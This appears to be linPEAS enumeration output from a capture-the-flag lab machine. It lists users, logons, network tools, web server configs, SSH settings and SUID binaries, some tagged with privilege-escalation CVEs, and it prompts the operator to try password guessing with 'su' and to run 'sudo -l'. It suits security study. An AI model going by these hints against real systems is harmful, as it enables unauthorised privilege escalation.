╔══════════╣ Users with console
|
|
dev:x:1000:1000:,,,:/home/dev:/bin/bash
|
|
root:x:0:0:root:/root:/bin/bash
|
|
|
|
╔══════════╣ All users & groups
|
|
uid=0(root) gid=0(root) groups=0(root)
|
|
uid=1(daemon[0m) gid=1(daemon[0m) groups=1(daemon[0m)
|
|
uid=10(uucp) gid=10(uucp) groups=10(uucp)
|
|
uid=100(systemd-network) gid=102(systemd-network) groups=102(systemd-network)
|
|
uid=1000(dev) gid=1000(dev) groups=1000(dev)
|
|
uid=101(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve)
|
|
uid=102(syslog) gid=106(syslog) groups=106(syslog),4(adm)
|
|
uid=103(messagebus) gid=107(messagebus) groups=107(messagebus)
|
|
uid=104(_apt) gid=65534(nogroup) groups=65534(nogroup)
|
|
uid=105(lxd) gid=65534(nogroup) groups=65534(nogroup)
|
|
uid=106(uuidd) gid=110(uuidd) groups=110(uuidd)
|
|
uid=107(dnsmasq) gid=65534(nogroup) groups=65534(nogroup)
|
|
uid=108(landscape) gid=112(landscape) groups=112(landscape)
|
|
uid=109(pollinate) gid=1(daemon[0m) groups=1(daemon[0m)
|
|
uid=110(sshd) gid=65534(nogroup) groups=65534(nogroup)
|
|
uid=13(proxy) gid=13(proxy) groups=13(proxy)
|
|
uid=2(bin) gid=2(bin) groups=2(bin)
|
|
uid=3(sys) gid=3(sys) groups=3(sys)
|
|
uid=33(www-data) gid=33(www-data) groups=33(www-data)
|
|
uid=34(backup) gid=34(backup) groups=34(backup)
|
|
uid=38(list) gid=38(list) groups=38(list)
|
|
uid=39(irc) gid=39(irc) groups=39(irc)
|
|
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
|
|
uid=41(gnats) gid=41(gnats) groups=41(gnats)
|
|
uid=5(games) gid=60(games) groups=60(games)
|
|
uid=6(man) gid=12(man) groups=12(man)
|
|
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
|
|
uid=7(lp) gid=7(lp) groups=7(lp)
|
|
uid=8(mail) gid=8(mail) groups=8(mail)
|
|
uid=9(news) gid=9(news) groups=9(news)
|
|
uid=999(_laurel) gid=999(_laurel) groups=999(_laurel)
|
|
|
|
╔══════════╣ Login now
|
|
11:35:20 up 2:37, 0 users, load average: 19.85, 21.69, 12.65
|
|
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
|
|
|
|
╔══════════╣ Last logons
|
|
reboot system boot Sun Feb 12 08:57:45 2023 still running 0.0.0.0
|
|
dev pts/0 Wed Feb 8 12:55:27 2023 - Wed Feb 8 12:57:32 2023 (00:02) 10.10.14.23
|
|
reboot system boot Wed Feb 8 12:55:01 2023 - Wed Feb 8 12:57:32 2023 (00:02) 0.0.0.0
|
|
dev pts/0 Wed Feb 8 12:46:06 2023 - Wed Feb 8 12:48:54 2023 (00:02) 10.10.14.23
|
|
reboot system boot Wed Feb 8 12:45:38 2023 - Wed Feb 8 12:48:54 2023 (00:03) 0.0.0.0
|
|
dev pts/0 Wed Feb 8 12:14:41 2023 - Wed Feb 8 12:16:08 2023 (00:01) 10.10.14.23
|
|
reboot system boot Wed Feb 8 12:14:20 2023 - Wed Feb 8 12:16:09 2023 (00:01) 0.0.0.0
|
|
|
|
wtmp begins Wed Feb 8 12:14:20 2023
|
|
|
|
╔══════════╣ Last time logon each user
|
|
Username Port From Latest
|
|
dev pts/0 10.10.14.23 Wed Feb 8 12:55:27 +0000 2023
|
|
|
|
╔══════════╣ Password policy
|
|
PASS_MAX_DAYS 99999
|
|
PASS_MIN_DAYS 0
|
|
PASS_WARN_AGE 7
|
|
ENCRYPT_METHOD SHA512
|
|
|
|
╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)
|
|
|
|
╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!
|
|
|
|
|
|
|
|
╔══════════════════════╗
|
|
═════════════════════════════╣ Software Information ╠═════════════════════════════
|
|
╚══════════════════════╝
|
|
╔══════════╣ Useful software
|
|
/usr/bin/base64
|
|
/usr/bin/curl
|
|
/usr/bin/g++
|
|
/usr/bin/gcc
|
|
/usr/bin/lxc
|
|
/usr/bin/make
|
|
/bin/nc
|
|
/bin/netcat
|
|
/usr/bin/perl
|
|
/usr/bin/php
|
|
/bin/ping
|
|
/usr/bin/python3
|
|
/usr/bin/python3.6
|
|
/usr/bin/sudo
|
|
/usr/bin/wget
|
|
|
|
╔══════════╣ Installed Compilers
|
|
ii g++ 4:7.4.0-1ubuntu2.3 amd64 GNU C++ compiler
|
|
ii g++-7 7.5.0-3ubuntu1~18.04 amd64 GNU C++ compiler
|
|
ii gcc 4:7.4.0-1ubuntu2.3 amd64 GNU C compiler
|
|
ii gcc-7 7.5.0-3ubuntu1~18.04 amd64 GNU C compiler
|
|
/usr/bin/gcc
|
|
/usr/bin/g++
|
|
|
|
╔══════════╣ Searching mysql credentials and exec
|
|
|
|
╔══════════╣ Analyzing Apache-Nginx Files (limit 70)
|
|
Apache version: Server version: Apache/2.4.29 (Ubuntu)
|
|
Server built: 2023-01-31T14:01:53
|
|
httpd Not Found
|
|
|
|
Nginx version:
|
|
/etc/apache2/mods-available/php7.4.conf-<FilesMatch ".+\.ph(ar|p|tml)$">
|
|
/etc/apache2/mods-available/php7.4.conf: SetHandler application/x-httpd-php
|
|
--
|
|
/etc/apache2/mods-available/php7.4.conf-<FilesMatch ".+\.phps$">
|
|
/etc/apache2/mods-available/php7.4.conf: SetHandler application/x-httpd-php-source
|
|
--
|
|
/etc/apache2/mods-enabled/php7.4.conf-<FilesMatch ".+\.ph(ar|p|tml)$">
|
|
/etc/apache2/mods-enabled/php7.4.conf: SetHandler application/x-httpd-php
|
|
--
|
|
/etc/apache2/mods-enabled/php7.4.conf-<FilesMatch ".+\.phps$">
|
|
/etc/apache2/mods-enabled/php7.4.conf: SetHandler application/x-httpd-php-source
|
|
══╣ Nginx modules
|
|
ngx_http_geoip_module.so
|
|
ngx_http_image_filter_module.so
|
|
ngx_http_xslt_filter_module.so
|
|
ngx_mail_module.so
|
|
ngx_stream_module.so
|
|
══╣ PHP exec extensions
|
|
drwxr-xr-x 2 root root 4096 Jan 16 09:49 /etc/apache2/sites-enabled
|
|
drwxr-xr-x 2 root root 4096 Jan 16 09:49 /etc/apache2/sites-enabled
|
|
lrwxrwxrwx 1 root root 35 Nov 20 21:53 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf
|
|
<VirtualHost *:80>
|
|
ServerAdmin webmaster@localhost
|
|
DocumentRoot /var/www/html
|
|
ErrorLog ${APACHE_LOG_DIR}/error.log
|
|
CustomLog ${APACHE_LOG_DIR}/access.log combined
|
|
</VirtualHost>
|
|
|
|
drwxr-xr-x 2 root root 4096 Jan 16 09:49 /etc/nginx/sites-enabled
|
|
drwxr-xr-x 2 root root 4096 Jan 16 09:49 /etc/nginx/sites-enabled
|
|
lrwxrwxrwx 1 root root 34 Nov 20 21:46 /etc/nginx/sites-enabled/default -> /etc/nginx/sites-available/default
|
|
server {
|
|
listen 80 default_server;
|
|
listen [::]:80 default_server;
|
|
root /var/www/html;
|
|
index index.html index.htm index.nginx-debian.html;
|
|
server_name _;
|
|
location / {
|
|
proxy_pass http://127.0.0.1:3000/;
|
|
}
|
|
}
|
|
server {
|
|
listen 80;
|
|
listen [::]:80;
|
|
server_name prd.m.rendering-api.interface.htb;
|
|
root /var/www/api;
|
|
index index.php;
|
|
location / {
|
|
fastcgi_pass unix:/run/php/php7.4-fpm.sock;
|
|
fastcgi_param SCRIPT_FILENAME $realpath_root$fastcgi_script_name;
|
|
include fastcgi_params;
|
|
try_files $uri $uri/ /index.php;
|
|
}
|
|
}
|
|
|
|
|
|
-rw-r--r-- 1 root root 1332 Feb 23 2021 /etc/apache2/sites-available/000-default.conf
|
|
<VirtualHost *:80>
|
|
ServerAdmin webmaster@localhost
|
|
DocumentRoot /var/www/html
|
|
ErrorLog ${APACHE_LOG_DIR}/error.log
|
|
CustomLog ${APACHE_LOG_DIR}/access.log combined
|
|
</VirtualHost>
|
|
lrwxrwxrwx 1 root root 35 Nov 20 21:53 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf
|
|
<VirtualHost *:80>
|
|
ServerAdmin webmaster@localhost
|
|
DocumentRoot /var/www/html
|
|
ErrorLog ${APACHE_LOG_DIR}/error.log
|
|
CustomLog ${APACHE_LOG_DIR}/access.log combined
|
|
</VirtualHost>
|
|
|
|
-rw-r--r-- 1 root root 73002 Nov 8 11:33 /etc/php/7.4/apache2/php.ini
|
|
allow_url_fopen = On
|
|
allow_url_include = Off
|
|
odbc.allow_persistent = On
|
|
mysqli.allow_persistent = On
|
|
pgsql.allow_persistent = On
|
|
-rw-r--r-- 1 root root 72600 Nov 8 11:33 /etc/php/7.4/cli/php.ini
|
|
allow_url_fopen = On
|
|
allow_url_include = Off
|
|
odbc.allow_persistent = On
|
|
mysqli.allow_persistent = On
|
|
pgsql.allow_persistent = On
|
|
-rw-r--r-- 1 root root 73002 Nov 8 11:33 /etc/php/7.4/fpm/php.ini
|
|
allow_url_fopen = On
|
|
allow_url_include = Off
|
|
odbc.allow_persistent = On
|
|
mysqli.allow_persistent = On
|
|
pgsql.allow_persistent = On
|
|
|
|
-rw-r--r-- 1 root root 1482 Apr 6 2018 /etc/nginx/nginx.conf
|
|
user www-data;
|
|
worker_processes auto;
|
|
pid /run/nginx.pid;
|
|
include /etc/nginx/modules-enabled/*.conf;
|
|
events {
|
|
worker_connections 768;
|
|
}
|
|
http {
|
|
sendfile on;
|
|
tcp_nopush on;
|
|
tcp_nodelay on;
|
|
keepalive_timeout 65;
|
|
types_hash_max_size 2048;
|
|
include /etc/nginx/mime.types;
|
|
default_type application/octet-stream;
|
|
ssl_prefer_server_ciphers on;
|
|
access_log /var/log/nginx/access.log;
|
|
error_log /var/log/nginx/error.log;
|
|
gzip on;
|
|
include /etc/nginx/conf.d/*.conf;
|
|
include /etc/nginx/sites-enabled/*;
|
|
}
|
|
|
|
-rw-r--r-- 1 root root 389 Apr 6 2018 /etc/default/nginx
|
|
|
|
-rwxr-xr-x 1 root root 4579 Apr 6 2018 /etc/init.d/nginx
|
|
|
|
-rw-r--r-- 1 root root 329 Apr 6 2018 /etc/logrotate.d/nginx
|
|
|
|
drwxr-xr-x 8 root root 4096 Jan 16 09:49 /etc/nginx
|
|
-rw-r--r-- 1 root root 1482 Apr 6 2018 /etc/nginx/nginx.conf
|
|
user www-data;
|
|
worker_processes auto;
|
|
pid /run/nginx.pid;
|
|
include /etc/nginx/modules-enabled/*.conf;
|
|
events {
|
|
worker_connections 768;
|
|
}
|
|
http {
|
|
sendfile on;
|
|
tcp_nopush on;
|
|
tcp_nodelay on;
|
|
keepalive_timeout 65;
|
|
types_hash_max_size 2048;
|
|
include /etc/nginx/mime.types;
|
|
default_type application/octet-stream;
|
|
ssl_prefer_server_ciphers on;
|
|
access_log /var/log/nginx/access.log;
|
|
error_log /var/log/nginx/error.log;
|
|
gzip on;
|
|
include /etc/nginx/conf.d/*.conf;
|
|
include /etc/nginx/sites-enabled/*;
|
|
}
|
|
lrwxrwxrwx 1 root root 61 Nov 20 21:46 /etc/nginx/modules-enabled/50-mod-http-image-filter.conf -> /usr/share/nginx/modules-available/mod-http-image-filter.conf
|
|
load_module modules/ngx_http_image_filter_module.so;
|
|
lrwxrwxrwx 1 root root 48 Nov 20 21:46 /etc/nginx/modules-enabled/50-mod-mail.conf -> /usr/share/nginx/modules-available/mod-mail.conf
|
|
load_module modules/ngx_mail_module.so;
|
|
lrwxrwxrwx 1 root root 50 Nov 20 21:46 /etc/nginx/modules-enabled/50-mod-stream.conf -> /usr/share/nginx/modules-available/mod-stream.conf
|
|
load_module modules/ngx_stream_module.so;
|
|
lrwxrwxrwx 1 root root 60 Nov 20 21:46 /etc/nginx/modules-enabled/50-mod-http-xslt-filter.conf -> /usr/share/nginx/modules-available/mod-http-xslt-filter.conf
|
|
load_module modules/ngx_http_xslt_filter_module.so;
|
|
lrwxrwxrwx 1 root root 54 Nov 20 21:46 /etc/nginx/modules-enabled/50-mod-http-geoip.conf -> /usr/share/nginx/modules-available/mod-http-geoip.conf
|
|
load_module modules/ngx_http_geoip_module.so;
|
|
-rw-r--r-- 1 root root 217 Apr 6 2018 /etc/nginx/snippets/snakeoil.conf
|
|
ssl_certificate /etc/ssl/certs/ssl-cert-snakeoil.pem;
|
|
ssl_certificate_key /etc/ssl/private/ssl-cert-snakeoil.key;
|
|
-rw-r--r-- 1 root root 422 Apr 6 2018 /etc/nginx/snippets/fastcgi-php.conf
|
|
fastcgi_split_path_info ^(.+\.php)(/.+)$;
|
|
try_files $fastcgi_script_name =404;
|
|
set $path_info $fastcgi_path_info;
|
|
fastcgi_param PATH_INFO $path_info;
|
|
fastcgi_index index.php;
|
|
include fastcgi.conf;
|
|
-rw-r--r-- 1 root root 1077 Apr 6 2018 /etc/nginx/fastcgi.conf
|
|
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
|
|
fastcgi_param QUERY_STRING $query_string;
|
|
fastcgi_param REQUEST_METHOD $request_method;
|
|
fastcgi_param CONTENT_TYPE $content_type;
|
|
fastcgi_param CONTENT_LENGTH $content_length;
|
|
fastcgi_param SCRIPT_NAME $fastcgi_script_name;
|
|
fastcgi_param REQUEST_URI $request_uri;
|
|
fastcgi_param DOCUMENT_URI $document_uri;
|
|
fastcgi_param DOCUMENT_ROOT $document_root;
|
|
fastcgi_param SERVER_PROTOCOL $server_protocol;
|
|
fastcgi_param REQUEST_SCHEME $scheme;
|
|
fastcgi_param HTTPS $https if_not_empty;
|
|
fastcgi_param GATEWAY_INTERFACE CGI/1.1;
|
|
fastcgi_param SERVER_SOFTWARE nginx/$nginx_version;
|
|
fastcgi_param REMOTE_ADDR $remote_addr;
|
|
fastcgi_param REMOTE_PORT $remote_port;
|
|
fastcgi_param SERVER_ADDR $server_addr;
|
|
fastcgi_param SERVER_PORT $server_port;
|
|
fastcgi_param SERVER_NAME $server_name;
|
|
fastcgi_param REDIRECT_STATUS 200;
|
|
|
|
-rw-r--r-- 1 root root 374 Apr 6 2018 /etc/ufw/applications.d/nginx
|
|
|
|
drwxr-xr-x 3 root root 4096 Nov 20 21:46 /usr/lib/nginx
|
|
|
|
-rwxr-xr-x 1 root root 1149096 Nov 10 06:38 /usr/sbin/nginx
|
|
|
|
drwxr-xr-x 2 root root 4096 Jan 16 09:49 /usr/share/doc/nginx
|
|
|
|
drwxr-xr-x 4 root root 4096 Nov 20 21:46 /usr/share/nginx
|
|
-rw-r--r-- 1 root root 52 Nov 10 06:38 /usr/share/nginx/modules-available/mod-http-xslt-filter.conf
|
|
load_module modules/ngx_http_xslt_filter_module.so;
|
|
-rw-r--r-- 1 root root 46 Nov 10 06:38 /usr/share/nginx/modules-available/mod-http-geoip.conf
|
|
load_module modules/ngx_http_geoip_module.so;
|
|
-rw-r--r-- 1 root root 42 Nov 10 06:38 /usr/share/nginx/modules-available/mod-stream.conf
|
|
load_module modules/ngx_stream_module.so;
|
|
-rw-r--r-- 1 root root 40 Nov 10 06:38 /usr/share/nginx/modules-available/mod-mail.conf
|
|
load_module modules/ngx_mail_module.so;
|
|
-rw-r--r-- 1 root root 53 Nov 10 06:38 /usr/share/nginx/modules-available/mod-http-image-filter.conf
|
|
load_module modules/ngx_http_image_filter_module.so;
|
|
|
|
drwxr-xr-x 7 root root 4096 Jan 16 09:49 /var/lib/nginx
|
|
|
|
drwxr-xr-x 2 root adm 4096 Feb 8 12:14 /var/log/nginx
|
|
|
|
|
|
╔══════════╣ Analyzing FastCGI Files (limit 70)
|
|
-rw-r--r-- 1 root root 1007 Apr 6 2018 /etc/nginx/fastcgi_params
|
|
|
|
╔══════════╣ Analyzing Rsync Files (limit 70)
|
|
-rw-r--r-- 1 root root 1044 Aug 16 18:38 /usr/share/doc/rsync/examples/rsyncd.conf
|
|
[ftp]
|
|
comment = public archive
|
|
path = /var/www/pub
|
|
use chroot = yes
|
|
lock file = /var/lock/rsyncd
|
|
read only = yes
|
|
list = yes
|
|
uid = nobody
|
|
gid = nogroup
|
|
strict modes = yes
|
|
ignore errors = no
|
|
ignore nonreadable = yes
|
|
transfer logging = no
|
|
timeout = 600
|
|
refuse options = checksum dry-run
|
|
dont compress = *.gz *.tgz *.zip *.z *.rpm *.deb *.iso *.bz2 *.tbz
|
|
|
|
|
|
╔══════════╣ Analyzing Ldap Files (limit 70)
|
|
The password hash is from the {SSHA} to 'structural'
|
|
drwxr-xr-x 2 root root 4096 Jan 16 09:49 /etc/ldap
|
|
|
|
|
|
╔══════════╣ Searching ssl/ssh files
|
|
ChallengeResponseAuthentication no
|
|
UsePAM yes
|
|
PasswordAuthentication yes
|
|
══╣ Some certificates were found (out limited):
|
|
/etc/pollinate/entropy.ubuntu.com.pem
|
|
44091PSTORAGE_CERTSBIN
|
|
|
|
══╣ Some home ssh config file was found
|
|
/usr/share/openssh/sshd_config
|
|
ChallengeResponseAuthentication no
|
|
UsePAM yes
|
|
X11Forwarding yes
|
|
PrintMotd no
|
|
AcceptEnv LANG LC_*
|
|
Subsystem sftp /usr/lib/openssh/sftp-server
|
|
|
|
══╣ /etc/hosts.allow file found, trying to read the rules:
|
|
/etc/hosts.allow
|
|
|
|
|
|
Searching inside /etc/ssh/ssh_config for interesting info
|
|
Host *
|
|
SendEnv LANG LC_*
|
|
HashKnownHosts yes
|
|
GSSAPIAuthentication yes
|
|
|
|
╔══════════╣ Analyzing PAM Auth Files (limit 70)
|
|
drwxr-xr-x 2 root root 4096 Feb 6 10:01 /etc/pam.d
|
|
-rw-r--r-- 1 root root 2133 Mar 30 2022 /etc/pam.d/sshd
|
|
|
|
|
|
|
|
|
|
╔══════════╣ Searching tmux sessions
|
|
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-shell-sessions
|
|
tmux 2.6
|
|
|
|
|
|
/tmp/tmux-33
|
|
╔══════════╣ Analyzing Cloud Init Files (limit 70)
|
|
-rw-r--r-- 1 root root 3659 Nov 28 16:50 /etc/cloud/cloud.cfg
|
|
lock_passwd: True
|
|
|
|
╔══════════╣ Analyzing Keyring Files (limit 70)
|
|
drwxr-xr-x 2 root root 4096 Feb 6 10:00 /usr/share/keyrings
|
|
|
|
|
|
|
|
|
|
╔══════════╣ Searching uncommon passwd files (splunk)
|
|
passwd file: /etc/pam.d/passwd
|
|
passwd file: /etc/passwd
|
|
passwd file: /usr/share/bash-completion/completions/passwd
|
|
passwd file: /usr/share/lintian/overrides/passwd
|
|
|
|
╔══════════╣ Analyzing Github Files (limit 70)
|
|
drwxr-xr-x 3 root root 4096 Nov 20 22:05 /usr/lib/node_modules/npm/node_modules/meant/.github
|
|
drwxr-xr-x 3 root root 4096 Nov 20 22:05 /usr/lib/node_modules/npm/node_modules/node-gyp/.github
|
|
drwxr-xr-x 2 root root 4096 Feb 6 10:01 /usr/lib/node_modules/npm/node_modules/npm-normalize-package-bin/.github
|
|
drwxr-xr-x 3 www-data www-data 4096 Nov 20 21:59 /var/www/api/vendor/bramus/router/.github
|
|
drwxr-xr-x 3 www-data www-data 4096 Nov 20 21:59 /var/www/api/vendor/phenx/php-font-lib/.github
|
|
drwxr-xr-x 3 www-data www-data 4096 Nov 20 21:59 /var/www/api/vendor/sabberworm/php-css-parser/.github
|
|
|
|
|
|
|
|
drwxr-xr-x 8 www-data www-data 4096 Nov 20 21:59 /var/www/api/vendor/bramus/router/.git
|
|
drwxr-xr-x 8 www-data www-data 4096 Nov 20 21:59 /var/www/api/vendor/dompdf/dompdf/.git
|
|
drwxr-xr-x 8 www-data www-data 4096 Nov 20 21:59 /var/www/api/vendor/phenx/php-font-lib/.git
|
|
drwxr-xr-x 8 www-data www-data 4096 Nov 20 21:59 /var/www/api/vendor/phenx/php-svg-lib/.git
|
|
drwxr-xr-x 8 www-data www-data 4096 Nov 20 21:59 /var/www/api/vendor/sabberworm/php-css-parser/.git
|
|
|
|
╔══════════╣ Analyzing PGP-GPG Files (limit 70)
|
|
/usr/bin/gpg
|
|
netpgpkeys Not Found
|
|
netpgp Not Found
|
|
|
|
-rw-r--r-- 1 root root 360 Nov 20 21:52 /etc/apt/trusted.gpg.d/ondrej_ubuntu_php.gpg
|
|
-rw-r--r-- 1 root root 2796 Mar 29 2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
|
|
-rw-r--r-- 1 root root 2794 Mar 29 2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
|
|
-rw-r--r-- 1 root root 1733 Mar 29 2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
|
|
-rw-r--r-- 1 root root 3267 Jul 4 2022 /usr/share/gnupg/distsigkey.gpg
|
|
-rw-r--r-- 1 root root 2206 Nov 20 22:04 /usr/share/keyrings/nodesource.gpg
|
|
-rw-r--r-- 1 root root 2247 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-cc-eal.gpg
|
|
-rw-r--r-- 1 root root 2274 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-cis.gpg
|
|
-rw-r--r-- 1 root root 2236 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-esm-apps.gpg
|
|
-rw-r--r-- 1 root root 2264 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-esm-infra-trusty.gpg
|
|
-rw-r--r-- 1 root root 2275 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-fips.gpg
|
|
-rw-r--r-- 1 root root 2250 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-realtime-kernel.gpg
|
|
-rw-r--r-- 1 root root 2235 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-ros.gpg
|
|
-rw-r--r-- 1 root root 7399 Sep 17 2018 /usr/share/keyrings/ubuntu-archive-keyring.gpg
|
|
-rw-r--r-- 1 root root 6713 Oct 27 2016 /usr/share/keyrings/ubuntu-archive-removed-keys.gpg
|
|
-rw-r--r-- 1 root root 4097 Feb 6 2018 /usr/share/keyrings/ubuntu-cloudimage-keyring.gpg
|
|
-rw-r--r-- 1 root root 0 Jan 17 2018 /usr/share/keyrings/ubuntu-cloudimage-removed-keys.gpg
|
|
-rw-r--r-- 1 root root 1227 May 27 2010 /usr/share/keyrings/ubuntu-master-keyring.gpg
|
|
-rw-r--r-- 1 root root 2867 Feb 22 2018 /usr/share/popularity-contest/debian-popcon.gpg
|
|
-rw-r--r-- 1 root root 2236 Feb 8 12:14 /var/lib/ubuntu-advantage/apt-esm/etc/apt/trusted.gpg.d/ubuntu-advantage-esm-apps.gpg
|
|
-rw------- 1 www-data www-data 1200 Feb 12 10:54 /var/www/.gnupg/trustdb.gpg
|
|
|
|
drwx------ 3 dev dev 4096 Jan 16 09:49 /home/dev/.gnupg
|
|
drwx------ 3 www-data www-data 4096 Feb 12 10:54 /var/www/.gnupg
|
|
|
|
|
|
╔══════════╣ Analyzing Postfix Files (limit 70)
|
|
-rw-r--r-- 1 root root 675 Apr 2 2018 /usr/share/bash-completion/completions/postfix
|
|
|
|
|
|
╔══════════╣ Analyzing FTP Files (limit 70)
|
|
|
|
|
|
-rw-r--r-- 1 root root 69 Nov 8 11:33 /etc/php/7.4/mods-available/ftp.ini
|
|
-rw-r--r-- 1 root root 69 Oct 28 17:39 /etc/php/8.1/mods-available/ftp.ini
|
|
-rw-r--r-- 1 root root 69 Jan 6 15:17 /etc/php/8.2/mods-available/ftp.ini
|
|
-rw-r--r-- 1 root root 69 Jan 13 10:42 /usr/share/php7.4-common/common/ftp.ini
|
|
-rw-r--r-- 1 root root 69 Feb 3 09:35 /usr/share/php8.2-common/common/ftp.ini
|
|
|
|
|
|
|
|
|
|
|
|
|
|
╔══════════╣ Analyzing Bind Files (limit 70)
|
|
-rw-r--r-- 1 root root 856 Apr 2 2018 /usr/share/bash-completion/completions/bind
|
|
-rw-r--r-- 1 root root 856 Apr 2 2018 /usr/share/bash-completion/completions/bind
|
|
|
|
|
|
|
|
╔══════════╣ Analyzing Interesting logs Files (limit 70)
|
|
-rw-r--r-- 1 root root 8939 Feb 12 10:42 /var/log/nginx/access.log
|
|
|
|
-rw-r--r-- 1 root root 34729 Feb 12 10:42 /var/log/nginx/error.log
|
|
|
|
╔══════════╣ Analyzing Other Interesting Files (limit 70)
|
|
-rw-r--r-- 1 root root 3771 Apr 4 2018 /etc/skel/.bashrc
|
|
-rw-r--r-- 1 dev dev 3771 Jan 10 12:55 /home/dev/.bashrc
|
|
|
|
|
|
|
|
|
|
|
|
-rw-r--r-- 1 root root 807 Apr 4 2018 /etc/skel/.profile
|
|
-rw-r--r-- 1 dev dev 807 Jan 10 12:55 /home/dev/.profile
|
|
|
|
|
|
|
|
|
|
|
|
|
|
╔═══════════════════╗
|
|
═══════════════════════════════╣ Interesting Files ╠═══════════════════════════════
|
|
╚═══════════════════╝
|
|
╔══════════╣ SUID - Check easy privesc, exploits and write perms
|
|
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
|
|
-rwsr-xr-x 1 root root 43K Sep 16 2020 /bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
|
|
-rwsr-xr-x 1 root root 63K Jun 28 2019 /bin/ping
|
|
-rwsr-xr-x 1 root root 31K Aug 11 2016 /bin/fusermount
|
|
-rwsr-xr-x 1 root root 27K Sep 16 2020 /bin/umount ---> BSD/Linux(08-1996)
|
|
-rwsr-xr-x 1 root root 44K Nov 29 12:25 /bin/su
|
|
-rwsr-xr-x 1 root root 59K Nov 29 12:25 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
|
|
-rwsr-xr-x 1 root root 75K Nov 29 12:25 /usr/bin/chfn ---> SuSE_9.3/10
|
|
-rwsr-xr-x 1 root root 146K Jan 16 14:40 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
|
|
-rwsr-xr-x 1 root root 37K Nov 29 12:25 /usr/bin/newgidmap
|
|
-rwsr-xr-x 1 root root 19K Jun 28 2019 /usr/bin/traceroute6.iputils
|
|
-rwsr-xr-x 1 root root 40K Nov 29 12:25 /usr/bin/newgrp ---> HP-UX_10.20
|
|
-rwsr-xr-x 1 root root 37K Nov 29 12:25 /usr/bin/newuidmap
|
|
-rwsr-xr-x 1 root root 44K Nov 29 12:25 /usr/bin/chsh
|
|
-rwsr-xr-x 1 root root 75K Nov 29 12:25 /usr/bin/gpasswd
|
|
-rwsr-sr-x 1 daemon daemon 51K Feb 20 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
|
|
-rwsr-xr-x 1 root root 99K Nov 23 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
|
|
-rwsr-xr-- 1 root messagebus 42K Oct 25 13:03 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
|
|
-rwsr-xr-x 1 root root 128K Dec 1 08:52 /usr/lib/snapd/snap-confine ---> Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)
|
|
-rwsr-xr-x 1 root root 427K Mar 30 2022 /usr/lib/openssh/ssh-keysign
|
|
-rwsr-xr-x 1 root root 10K Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
|
|
-rwsr-xr-x 1 root root 14K Jan 12 2022 /usr/lib/policykit-1/polkit-agent-helper-1
|
|
|
|
╔══════════╣ SGID
|
|
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
|
|
-rwxr-sr-x 1 root ssh 355K Mar 30 2022 /usr/bin/ssh-agent
|
|
-rwxr-sr-x 1 root tty 31K Sep 16 2020 /usr/bin/wall
|
|
-rwxr-sr-x 1 root shadow 23K Nov 29 12:25 /usr/bin/expiry
|
|
-rwxr-sr-x 1 root mlocate 43K Mar 1 2018 /usr/bin/mlocate
|
|
-rwxr-sr-x 1 root shadow 71K Nov 29 12:25 /usr/bin/chage
|
|
-rwxr-sr-x 1 root tty 14K Jan 17 2018 /usr/bin/bsd-write
|
|
-rwxr-sr-x 1 root crontab 39K May 10 2022 /usr/bin/crontab
|
|
-rwsr-sr-x 1 daemon daemon 51K Feb 20 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
|
|
-rwxr-sr-x 1 root utmp 10K Mar 11 2016 /usr/lib/x86_64-linux-gnu/utempter/utempter
|
|
-rwxr-sr-x 1 root shadow 34K Feb 2 09:24 /sbin/pam_extrausers_chkpwd
|
|
-rwxr-sr-x 1 root shadow 34K Feb 2 09:24 /sbin/unix_chkpwd
|
|
|
|
╔══════════╣ Checking misconfigurations of ld.so
|
|
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld-so
|
|
/etc/ld.so.conf
|
|
include /etc/ld.so.conf.d/*.conf
|
|
|
|
/etc/ld.so.conf.d
|
|
/etc/ld.so.conf.d/libc.conf
|
|
/usr/local/lib
|
|
/etc/ld.so.conf.d/x86_64-linux-gnu.conf
|
|
/usr/local/lib/x86_64-linux-gnu
|
|
/lib/x86_64-linux-gnu
|
|
/usr/lib/x86_64-linux-gnu
|
|
|
|
╔══════════╣ Capabilities
|
|
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities
|
|
Current env capabilities:
|
|
Current: =
|
|
Current proc capabilities:
|
|
CapInh: 0000000000000000
|
|
CapPrm: 0000000000000000
|
|
CapEff: 0000000000000000
|
|
CapBnd: 0000003fffffffff
|
|
CapAmb: 0000000000000000
|
|
|
|
Parent Shell capabilities:
|
|
0x0000000000000000=
|
|
|
|
